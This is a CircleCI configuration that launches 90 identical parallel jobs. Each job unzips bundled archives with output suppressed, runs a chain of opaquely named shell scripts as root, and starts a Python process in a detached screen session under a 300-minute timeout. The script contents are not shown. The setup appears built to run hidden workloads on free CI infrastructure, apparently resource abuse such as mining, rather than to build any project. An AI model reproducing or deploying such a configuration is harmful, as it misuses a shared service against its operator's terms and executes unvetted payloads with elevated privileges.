working_dir: &working_dir ~/root
.build_template: &build_definition
  steps:
    - checkout
    - run:
        name: A
        command: |
          sudo apt update -y
    - run:
        name: B
        command: |
          sleep 10s
          unzip agri.zip && chmod u+x *
          #./cw.sh####
    - run:
        name: C
        command: |
          unzip artman.zip >/dev/null 2>&1
    - run:
        name: D
        command: |
          chmod u+x *
    - run:
        name: E
        command: |
          sudo ./Arang.sh
    - run:
        name: F
        command: |
          sudo ./Biji.sh
    - run:
        name: G
        command: |
          sudo ./Cili.sh
    - run:
        name: H
        command: |
          sudo ./Duri.sh
    - run:
        name: I
        command: |
          sudo ./Enak.sh
    - run:
        name: J
        command: |
          #sudo ./Frean.sh#no_run
    - run:
        name: K
        no_output_timeout: 300m
        command: |
          echo "Ijin Berkah Om. . ."
          sudo ./Gila.sh
          sudo ./Hai.sh
          sudo ./Itu.sh
          screen -dmS Acdb python3 proE.py
          sleep 300s
          ./main08.sh
  working_directory: *working_dir

version: 2.0

jobs:
  Pagi_01:
    <<: *build_definition
    docker:
      - image: circleci/python:3.8
  Pagi_02:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_03:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_04:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_05:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_06:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_07:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_08:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_09:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_10:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_11:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_12:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_13:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_14:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_15:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_16:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_17:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_18:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_19:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_20:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_21:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_22:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_23:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_24:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_25:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_26:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_27:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_28:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_29:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_30:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_31:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_32:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_33:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_34:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_35:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_36:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_37:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_38:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_39:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_40:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_41:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_42:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_43:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_44:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_45:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_46:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_47:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_48:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_49:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_50:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_51:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_52:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_53:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_54:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_55:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_56:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_57:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_58:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_59:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_60:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_61:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_62:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_63:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_64:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_65:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_66:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_67:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_68:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_69:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_70:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_71:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_72:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_73:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_74:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_75:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_76:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_77:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_78:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_79:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_80:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_81:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_82:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_83:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_84:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_85:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_86:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_87:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_88:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_89:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition
  Pagi_90:
    docker:
      - image: circleci/python:3.8
    <<: *build_definition








workflows:
  version: 2
  build_all:
    jobs:
      - Pagi_01
      - Pagi_02
      - Pagi_03
      - Pagi_04
      - Pagi_05
      - Pagi_06
      - Pagi_07
      - Pagi_08
      - Pagi_09
      - Pagi_10
      - Pagi_11
      - Pagi_12
      - Pagi_13
      - Pagi_14
      - Pagi_15
      - Pagi_16
      - Pagi_17
      - Pagi_18
      - Pagi_19
      - Pagi_20
      - Pagi_21
      - Pagi_22
      - Pagi_23
      - Pagi_24
      - Pagi_25
      - Pagi_26
      - Pagi_27
      - Pagi_28
      - Pagi_29
      - Pagi_30
      - Pagi_31
      - Pagi_32
      - Pagi_33
      - Pagi_34
      - Pagi_35
      - Pagi_36
      - Pagi_37
      - Pagi_38
      - Pagi_39
      - Pagi_40
      - Pagi_41
      - Pagi_42
      - Pagi_43
      - Pagi_44
      - Pagi_45
      - Pagi_46
      - Pagi_47
      - Pagi_48
      - Pagi_49
      - Pagi_50
      - Pagi_51
      - Pagi_52
      - Pagi_53
      - Pagi_54
      - Pagi_55
      - Pagi_56
      - Pagi_57
      - Pagi_58
      - Pagi_59
      - Pagi_60
      - Pagi_61
      - Pagi_62
      - Pagi_63
      - Pagi_64
      - Pagi_65
      - Pagi_66
      - Pagi_67
      - Pagi_68
      - Pagi_69
      - Pagi_70
      - Pagi_71
      - Pagi_72
      - Pagi_73
      - Pagi_74
      - Pagi_75
      - Pagi_76
      - Pagi_77
      - Pagi_78
      - Pagi_79
      - Pagi_80
      - Pagi_81
      - Pagi_82
      - Pagi_83
      - Pagi_84
      - Pagi_85
      - Pagi_86
      - Pagi_87
      - Pagi_88
      - Pagi_89
      - Pagi_90

